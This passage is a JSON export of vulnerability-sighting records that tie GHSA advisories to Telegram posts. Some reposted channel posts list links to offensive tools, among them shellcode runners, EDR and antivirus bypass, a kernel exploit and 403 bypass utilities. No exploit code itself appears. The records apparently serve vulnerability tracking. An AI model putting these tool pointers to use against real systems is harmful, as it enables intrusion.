"Telegram/hbVDftoo7cklg62Gdj6otKY7hUkOaO8wH7xugOEL8u8l2Gc", "content": "", "creation_timestamp": "2025-04-30T03:30:38.000000Z"}, {"uuid": "0dc64d99-9c17-48de-8df9-634a61926977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X975-8PGF-QH66", "type": "published-proof-of-concept", "source": "Telegram/_yKpLY-2F8rkEOUTUq6LWKwJhxpg13wwviIMmbyTTpOtBuI", "content": "", "creation_timestamp": "2025-02-25T09:01:42.000000Z"}, {"uuid": "cc2d0635-9ec4-4232-924d-0f4aca082d14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJHX-RRH4-J8MX", "type": "published-proof-of-concept", "source": "Telegram/_yKpLY-2F8rkEOUTUq6LWKwJhxpg13wwviIMmbyTTpOtBuI", "content": "", "creation_timestamp": "2025-02-25T09:01:42.000000Z"}, {"uuid": "c5fb0ace-040d-4566-af7b-93011ab0bda2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ67-649M-3P8X", "type": "seen", "source": "Telegram/oQ9Kw9Zl2wOAX0t2otL3t-FDZtfdA51tnzX72eUxYhs4IXs", "content": "", "creation_timestamp": "2025-04-30T17:32:02.000000Z"}, {"uuid": "23140669-50cb-41cb-8e40-eab4162ec239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-563G-P98J-MC9Q", "type": "published-proof-of-concept", "source": "Telegram/VXRJJzicS6h8NsLqawa6xGEeyKGpqGgMZmK2-Vj4U4LCCLc", "content": "", "creation_timestamp": "2025-04-30T01:00:20.000000Z"}, {"uuid": "513d6884-fd5e-4a5d-8826-5d8ec0f97fa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2F8P-QQX2-GWR2", "type": "published-proof-of-concept", "source": "Telegram/KFrCOSu3LGCSoC33LRQajUOfsycPM4aBiQ5_ifmvrLt0xH0", "content": "", "creation_timestamp": "2025-04-29T20:01:14.000000Z"}, {"uuid": "65128251-8275-404f-9412-c6da6efb5a78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8676", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T09:08:21.000000Z"}, {"uuid": "3de1fda8-3b23-4436-a003-576dbe19c3f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8831", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:52:22.000000Z"}, {"uuid": "414b3492-ba35-4650-9509-86a4fa41c418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7PR-FH39-XC2C", "type": "seen", "source": "https://t.me/arpsyndicate/286", "content": "#ExploitObserverAlert\n\nGHSA-m7pr-fh39-xc2c\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-M7PR-FH39-XC2C. The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject passive HTML.\n\nGHSS: 3.1", "creation_timestamp": "2023-11-20T12:18:16.000000Z"}, {"uuid": "8d077829-9bb9-434d-a68a-cbee6f084483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQPG-32GG-FVXH", "type": "seen", "source": "https://t.me/arpsyndicate/1545", "content": "#ExploitObserverAlert\n\nGHSA-rqpg-32gg-fvxh\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-RQPG-32GG-FVXH.\n\nGHSS: 7.3", "creation_timestamp": "2023-12-08T00:20:19.000000Z"}, {"uuid": "5f529d13-7c0e-4f91-8db3-7815146972c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMH6-7XP9-5GH8", "type": "seen", "source": "https://t.me/arpsyndicate/1513", "content": "#ExploitObserverAlert\n\nGHSA-wmh6-7xp9-5gh8\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-WMH6-7XP9-5GH8.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-06T16:59:55.000000Z"}, {"uuid": "96a5f32c-408f-4fb7-aafb-f9379a2250e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XRG-MH99-H5F7", "type": "seen", "source": "https://t.me/arpsyndicate/1520", "content": "#ExploitObserverAlert\n\nGHSA-9xrg-mh99-h5f7\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-9XRG-MH99-H5F7.\n\nGHSS: 9.8", "creation_timestamp": "2023-12-06T17:42:55.000000Z"}, {"uuid": "6deea487-63a9-4c25-94fc-b4c1c485ffc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6JV-PGMX-6FP3", "type": "seen", "source": "https://t.me/arpsyndicate/1473", "content": "#ExploitObserverAlert\n\nGHSA-j6jv-pgmx-6fp3\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-J6JV-PGMX-6FP3.\n\nGHSS: 9.8", "creation_timestamp": "2023-12-06T00:23:57.000000Z"}, {"uuid": "680380d9-57fe-4aa2-a200-b398f79700a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3733-6V6M-39MH", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/929", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:09:06.000000Z"}, {"uuid": "cb69c8a5-9c55-40d4-a183-d9dce141eba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/929", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-05-30T10:09:06.000000Z"}, {"uuid": "1bc0321a-5082-41be-b6f9-243a8e9e4db6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVV5-9H9W-QP2M", "type": "published-proof-of-concept", "source": "https://t.me/ZeroDay_ru/357", "content": "#WLAN_Security\n1. PMKID Attacks:\nDebunking the 802.11r Myth\nhttps://www.nccgroup.com/us/research-blog/pmkid-attacks-debunking-the-80211r-myth\n2. Command injection vulnerability in getWindowsIEEE8021x (SSID)\nhttps://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m", "creation_timestamp": "2024-12-26T12:06:04.000000Z"}, {"uuid": "b393409d-fc5b-45c8-9b53-9968b5db2249", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/759", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T05:29:59.000000Z"}, {"uuid": "17fdbb7c-beb3-4f2d-afb1-07d4bdda9d7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J777-63HF-HX76", "type": "published-proof-of-concept", "source": "Telegram/-0InU180zuFDOzfizBTPC_qSVbcEAafDlBazkR8IxJayLKc", "content": "", "creation_timestamp": "2025-01-23T04:30:41.000000Z"}, {"uuid": "49f0a036-8b0a-4e48-b966-43c68a7ccf7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3CW-HG6R-CHFV", "type": "published-proof-of-concept", "source": "Telegram/FuukJpUcWm8W7_orzQKqRLhyowzFyoFldGzWwBVSPpd5oCA", "content": "", "creation_timestamp": "2025-05-05T22:30:27.000000Z"}, {"uuid": "b3d12b69-2da3-4611-ac24-f0e19418a53e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7C58-G782-9J38", "type": "published-proof-of-concept", "source": "Telegram/FuukJpUcWm8W7_orzQKqRLhyowzFyoFldGzWwBVSPpd5oCA", "content": "", "creation_timestamp": "2025-05-05T22:30:27.000000Z"}, {"uuid": "5916e059-7419-4fd1-8bf0-de17463edaad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V56R-HWV5-MXG6", "type": "published-proof-of-concept", "source": "Telegram/9TpCNhQKFnadVGgW9WBxm9NS8GzN0eHgiitUv2OHldFzgpc", "content": "", "creation_timestamp": "2025-03-27T02:30:13.000000Z"}, {"uuid": "204cc3d3-bdec-4e57-b273-b5a5748f85a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPJ6-FHP6-MR6J", "type": "published-proof-of-concept", "source": "Telegram/oGnFJdmXUCqYx0_xYR0D8dpnhpl9VxD3P3IPRWVfgfpPSsY", "content": "", "creation_timestamp": "2025-04-25T03:30:33.000000Z"}, {"uuid": "ccdff4ff-d0df-49f8-8ab4-65fd46bebfa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F46R-RW29-R322", "type": "published-proof-of-concept", "source": "Telegram/oGnFJdmXUCqYx0_xYR0D8dpnhpl9VxD3P3IPRWVfgfpPSsY", "content": "", "creation_timestamp": "2025-04-25T03:30:33.000000Z"}, {"uuid": "29fbe232-9b70-4ba0-97b1-2835adfab898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R67F-P999-2GFF", "type": "published-proof-of-concept", "source": "Telegram/tGlnxgJ45kvnhr-0GuZEauiX58JIxK_MY4hRnR_Ek7fiyk0", "content": "", "creation_timestamp": "2025-04-23T20:32:34.000000Z"}, {"uuid": "b00d4ab4-6e2c-42d3-afe0-9a381671fc8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCRP-X7W3-FFMG", "type": "published-proof-of-concept", "source": "Telegram/PqVThVgVR3pSBa68e-BpU378IBW0ME4KUrEZUc8I0i5fDDc", "content": "", "creation_timestamp": "2025-01-29T23:30:41.000000Z"}, {"uuid": "5f3c0fe8-a51a-41c6-9b19-8d77c5f892a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRV3-JC3H-F3M6", "type": "published-proof-of-concept", "source": "Telegram/4yRTt9dy-kSa9hw9IvAX8xqiMQA60h8go96Ck2HC1in5CKw", "content": "", "creation_timestamp": "2025-03-25T17:30:48.000000Z"}, {"uuid": "c2594797-f9d6-405f-abb0-07701fe1239e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6X9-JM98-CW7C", "type": "seen", "source": "Telegram/UPegbdrUObQcnilNjDwpJsece7fi6CrosD2C8DpjNeOtPKM", "content": "", "creation_timestamp": "2025-03-25T16:30:59.000000Z"}, {"uuid": "bd9ededc-76ec-4ea2-8161-c6981ba4258b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GG42-CV66-F5X7", "type": "published-proof-of-concept", "source": "Telegram/I5Scwbbdp7WCzcFYeDRHdXSB07SWV9BvAC1tqlNr9m_BtWg", "content": "", "creation_timestamp": "2025-04-21T23:30:57.000000Z"}, {"uuid": "29cc24ef-f1ae-4c9e-8274-09dcc4d8a6ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GM2P-WF5C-W3PJ", "type": "published-proof-of-concept", "source": "Telegram/5EJUZnGupE7gi7RJmr2FV0ZRgpmrRFRfEIarwGmxg4P8ExE", "content": "", "creation_timestamp": "2025-04-21T18:31:51.000000Z"}, {"uuid": "90abbf8c-0499-48db-8864-8fb0e47fa924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P68-W45G-48J7", "type": "published-proof-of-concept", "source": "Telegram/5EJUZnGupE7gi7RJmr2FV0ZRgpmrRFRfEIarwGmxg4P8ExE", "content": "", "creation_timestamp": "2025-04-21T18:31:51.000000Z"}, {"uuid": "d6568065-c63e-49eb-9be9-d7cbcd29ff75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG2H-6X62-WPWC", "type": "published-proof-of-concept", "source": "Telegram/o9Pfw-M-GTwrCTTIwOJwUgm12Tx7Pgy5iImnbWlBRAjomOU", "content": "", "creation_timestamp": "2025-04-18T19:30:43.000000Z"}, {"uuid": "7e3c9aa6-5276-4e06-bfb2-36607f353df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H9W6-F932-GQ62", "type": "published-proof-of-concept", "source": "Telegram/o9Pfw-M-GTwrCTTIwOJwUgm12Tx7Pgy5iImnbWlBRAjomOU", "content": "", "creation_timestamp": "2025-04-18T19:30:43.000000Z"}, {"uuid": "d0a80835-4ac7-4b1f-b97e-54e1d7937dbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R4C-JWX3-3J76", "type": "published-proof-of-concept", "source": "Telegram/62ADuuFkUh-GLH8SzGnVJ7_7GwT3veD_kQ_-knb1-PeB1sA", "content": "", "creation_timestamp": "2025-02-06T21:00:33.000000Z"}, {"uuid": "b7f6a5fb-436d-4164-91ae-0b74285d6e1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7W4-9WV8-7X7C", "type": "published-proof-of-concept", "source": "Telegram/62ADuuFkUh-GLH8SzGnVJ7_7GwT3veD_kQ_-knb1-PeB1sA", "content": "", "creation_timestamp": "2025-02-06T21:00:33.000000Z"}, {"uuid": "f672793f-e77c-4085-a7b4-8352b0372b86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J82M-PC2V-2484", "type": "published-proof-of-concept", "source": "Telegram/wjbFsyzpQP11Ml-lHL7H7iubcZXwVaQmfBZteKGvee5xE4c", "content": "", "creation_timestamp": "2025-02-06T19:00:35.000000Z"}, {"uuid": "e56edb2c-7ef0-40c2-8036-bc2efc1c8469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C7V-VCCV-CX4Q", "type": "published-proof-of-concept", "source": "Telegram/I5Scwbbdp7WCzcFYeDRHdXSB07SWV9BvAC1tqlNr9m_BtWg", "content": "", "creation_timestamp": "2025-04-21T23:30:57.000000Z"}, {"uuid": "1f12e411-bee9-4c7d-b20f-e302ee478126", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GPJJ-F76M-9X3Q", "type": "published-proof-of-concept", "source": "Telegram/oRg411HAomHdISM9O3TVQssrB2w8dJGX9X47vD_NRx0yd1g", "content": "", "creation_timestamp": "2025-04-18T23:30:24.000000Z"}, {"uuid": "6f33e314-583c-49aa-bfd0-741a9ee1f530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36H8-R92J-W9VW", "type": "published-proof-of-concept", "source": "Telegram/2uxF_1qoFB3hlCxfLn3xIrN9O42tmrJDZ5kGfls8NVGPMqg", "content": "", "creation_timestamp": "2025-02-18T20:31:23.000000Z"}, {"uuid": "ffc19d77-baec-4914-a688-b3e258ede590", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3PM-RPGG-5WJ6", "type": "published-proof-of-concept", "source": "Telegram/2uxF_1qoFB3hlCxfLn3xIrN9O42tmrJDZ5kGfls8NVGPMqg", "content": "", "creation_timestamp": "2025-02-18T20:31:23.000000Z"}, {"uuid": "1675da8b-850e-42a0-b93e-d1fa0012a313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQ63-8F72-F486", "type": "published-proof-of-concept", "source": "Telegram/2uxF_1qoFB3hlCxfLn3xIrN9O42tmrJDZ5kGfls8NVGPMqg", "content": "", "creation_timestamp": "2025-02-18T20:31:23.000000Z"}, {"uuid": "81349972-cc4a-45cb-b094-3f8db2effa5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C27-WMVV-3P38", "type": "published-proof-of-concept", "source": "Telegram/2uxF_1qoFB3hlCxfLn3xIrN9O42tmrJDZ5kGfls8NVGPMqg", "content": "", "creation_timestamp": "2025-02-18T20:31:23.000000Z"}, {"uuid": "1a31776d-50fc-466e-83d9-af30fe649571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5984-MHCP-CQ2X", "type": "published-proof-of-concept", "source": "Telegram/7jNmJD5vjZVenNUqyYR0CPI9qktay_Z3-idVdIxY76S8ayI", "content": "", "creation_timestamp": "2025-04-18T18:31:46.000000Z"}, {"uuid": "d33b7a07-e7b3-41a0-86b2-ae86dcfd2404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PRX-RGR7-HQ5F", "type": "published-proof-of-concept", "source": "Telegram/7jNmJD5vjZVenNUqyYR0CPI9qktay_Z3-idVdIxY76S8ayI", "content": "", "creation_timestamp": "2025-04-18T18:31:46.000000Z"}, {"uuid": "0cd53cf7-2f58-4bde-beb7-a26ff42041d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22MC-7C9M-GV8H", "type": "published-proof-of-concept", "source": "Telegram/7jNmJD5vjZVenNUqyYR0CPI9qktay_Z3-idVdIxY76S8ayI", "content": "", "creation_timestamp": "2025-04-18T18:31:46.000000Z"}, {"uuid": "c6d1639c-ccec-47d5-9af9-4c6771507fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHVP-MWJ4-922M", "type": "published-proof-of-concept", "source": "Telegram/7jNmJD5vjZVenNUqyYR0CPI9qktay_Z3-idVdIxY76S8ayI", "content": "", "creation_timestamp": "2025-04-18T18:31:46.000000Z"}, {"uuid": "4cf63849-0fe2-49a4-81dc-90121cdd758f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53Q9-R3PM-6PQ6", "type": "published-proof-of-concept", "source": "Telegram/7jNmJD5vjZVenNUqyYR0CPI9qktay_Z3-idVdIxY76S8ayI", "content": "", "creation_timestamp": "2025-04-18T18:31:46.000000Z"}, {"uuid": "ead7c9ef-dffe-4da5-847c-8b0f716c12d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R8P-7MGP-VF56", "type": "published-proof-of-concept", "source": "Telegram/OeH9zkywoY5RVyH3R_smk_5t4405jKnk6ZNWTlGk6rqPQWQ", "content": "", "creation_timestamp": "2025-02-10T17:30:24.000000Z"}, {"uuid": "26e68b27-ba21-4814-903b-a68558a6d738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X27-JWJR-8545", "type": "published-proof-of-concept", "source": "Telegram/QFVP5TcYkEi5fC3DYhpbJ3tJ8sPusYmL1ImuYd1RRjGW6cE", "content": "", "creation_timestamp": "2025-05-01T20:00:50.000000Z"}, {"uuid": "3477ebea-0e21-451e-a4a6-9e4409082daa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P483-WPFP-42CJ", "type": "published-proof-of-concept", "source": "Telegram/HfdZK7IaNw2IgiSWMbJAgdBOWQpganIA_skYVFqg6YQ3yyg", "content": "", "creation_timestamp": "2025-05-09T23:31:22.000000Z"}, {"uuid": "f8cfb713-f63b-4824-9857-d48e86911b0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59JP-RWPH-878R", "type": 